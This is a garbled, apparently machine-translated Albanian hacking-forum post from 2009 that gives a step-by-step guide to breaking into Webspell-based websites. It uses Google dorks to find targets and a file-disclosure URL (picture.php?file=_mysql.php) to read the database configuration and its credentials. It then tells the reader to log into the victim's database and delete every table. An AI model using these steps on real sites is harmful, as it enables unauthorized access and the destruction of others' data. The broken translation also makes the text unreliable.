Mesa duket nuk jeni i regjistruar, kliko ne butonin Regjisrohu nqs dëshironi të bëheni pjesë e forumit tonë, per t'u regjistruar ju hargjoni maksimumi 1 min kohë. Me respekt Staffi. 
ForumPortaliCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimiChatBilardo

Share | 
 

 Si te hackosh Faqe

Shko poshtë 
AutoriMesazh
NoIsY
Super moderator
Super moderator


Postimet : 454
Vendodhja : n'Kamenic
Puna / Hobi : Hacker

MesazhTitulli: Si te hackosh Faqe   Wed Dec 16, 2009 6:05 am

Hey, një shumë e përdoruesve pyeti mua se si i hacked site
kështu që i bëri një tutorial se si me hack faqen tuaj të parë ..
kjo është metoda më e lehtë kollë e thatë, unë mendoj se do të jetë vërtetë e vështirë .. por jo, ajo isnt ..

1. Si për të filluar
---------
2. i gjetur një vend.Si për të filluar


- Ju nisem me Google, kërko disa Templates Webspell.
- Unë zgjedh Doublekey.de ata janë të lehtë (i vetëm gjerman kuptoni pak, por që çështjet doesnt)
- Tani allintitle kërkimit: google www.doublekey.de në qoftë se ju përdorni doublekey si unëI found a site

- Tani, kur ti gjetur pastaj faqen tuaj, ju duhet të figour se ajo
përdor magjistare Webspell është një sistem i lojrave, dhe të bëjë një
template doesnt qij, vetëm të saj një imazh feta!
- Tani lloj

Kodet PHP:
ww.thesite.com/picture.php?file=_mysql.php
- Dhe pastaj klikoni drejtë dhe burimi pikëpamje.
- NDOSHTA ju duhet të kërkoni diçka si kjo:

Kodet PHP:
<?php

$host
= "some ip or localhost here";

$user = "some kinda user here";

$pwd = "fucking pass here";

$db = "a database here ";

define(PREFIX, 'webs_');

?>


Nëse ka një ip ka provoni shtypni atë në adressbar dhe të shohim nëse kjo duket si
Click this bar to view the full image.

ani ju përdorni $ user = "username"
- Për të identifikoheni. dhe $ pwd = "albalb"
- Tani kur jeni futur me emrin tuaj.
- Kur ju mori në pastaj shtypni mbi bazën e të dhënave që ju la .. se e ke parë më parë në dokument.
- Tani shtyp dhe shkoni poshtë dhe zgjidhni të gjitha dhe pastaj fshini.
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.deshira-juaj.tk/
 
Si te hackosh Faqe
Mbrapsht në krye 
Faqja 1 e 1
 Similar topics
-
» Thenia e dites....
» Mos u trishto
» Njohja e Njeriut
» Një faqe interneti qe parashikon vdekjen e Personaliteteve
» Mendoni qe Alienet ekzistojne ?

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Paneli i Kontrollit :: HaCkinG-
Kërce tek: